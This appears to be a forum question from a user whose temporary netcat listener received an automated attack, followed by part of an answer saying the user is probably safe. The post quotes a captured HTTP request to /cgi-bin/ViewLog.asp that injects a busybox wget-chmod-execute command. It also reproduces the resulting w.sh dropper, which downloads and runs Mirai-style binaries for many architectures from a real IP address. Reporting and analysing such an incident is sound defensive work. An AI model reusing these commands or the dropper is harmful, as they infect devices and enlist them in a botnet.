TLDR
Someone has connected to my netcat server and tried to execute a command. Is it possible they have done any harm to me/my computer/my network?
Detailed story
I've been learning about networking and sockets recently. As a programming exercise I created a simple tcp client and wanted to test it with a netcat server.
Everything worked as expected - my client had connected to the server correctly.
My friend asked me to send them the client app so they can have a look. In order for the app to work for them with my local server I had to setup port forwarding on my router. I always knew it can be dangerous so I only wanted to set it up temporarily.
I started the sever with a netcat command:
nc -lvp 8080
and the next thing I notice is that someone has connected to my server but it wasn't my friend!
In my netcat output I can see this:
Connection from 1.192.147.162:60185
POST /cgi-bin/ViewLog.asp HTTP/1.1
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
/bin/busybox wget http://135.148.104.21/w.sh; chmod +x w.sh; ./w.sh%
You can see the Host as 192.168.0.14
, but there's no such device on my network! However I do understand the headers can be easily forged.
I have downloaded the w.sh to have a look at its contents - here they are:
wget http://135.148.104.21/bins/arm; chmod 777 arm; ./arm unidentified.arm
wget http://135.148.104.21/bins/arm5; chmod 777 arm5; ./arm5 unidentified.arm5
wget http://135.148.104.21/bins/arm6; chmod 777 arm6; ./arm6 unidentified.arm6
wget http://135.148.104.21/bins/arm7; chmod 777 arm7; ./arm7 unidentified.arm7
wget http://135.148.104.21/bins/mips; chmod 777 mips; ./mips unidentified.mips
wget http://135.148.104.21/bins/mipsel; chmod 777 mipsel; ./mipsel unidentified.mipsel
wget http://135.148.104.21/bins/x86; chmod 777 x86; ./x86 unidentified.x86
wget http://135.148.104.21/bins/i686; chmod 777 i686; ./i686 unidentified.i686
wget http://135.148.104.21/bins/i586; chmod 777 i586; ./i586 unidentified.i586
wget http://135.148.104.21/bins/arc; chmod 777 arc; ./arc unidentified.arc
wget http://135.148.104.21/bins/sh4; chmod 777 sh4; ./sh4 unidentified.sh4
rm $0
I have downloaded one of the above files but it seems that they're binary, so I didn't know how to analayse them.
Definetely seems like the attacker from China (location of the IP) was trying to download a script, execute it and gather some info from my computer, and likely tried to connect my computer to the mirai botnet (credits to the reddit user henrique_wavy
for finding this).
However the question is: is it even possible with the netcat server I was running? Am I in danger here?
Of course I have disabled the port forwarding straight away...
I'm running MacOS 12.6 and the GNU netcat 0.7.1 if it matters
/cgi-bin/ViewLog.asp
to have it execute commands locally. Since the connection wasn't to an ASP web server (and therefore didn't have the vulnerability this was meant to exploit), you're probably ok. Other commands might have been executed that do exploit netcat, but it's a lot less likely. Use this experience as a lesson in how ubiquitous the bad actors are, and carry on. FYI 8080 is a popular "the other web server" port.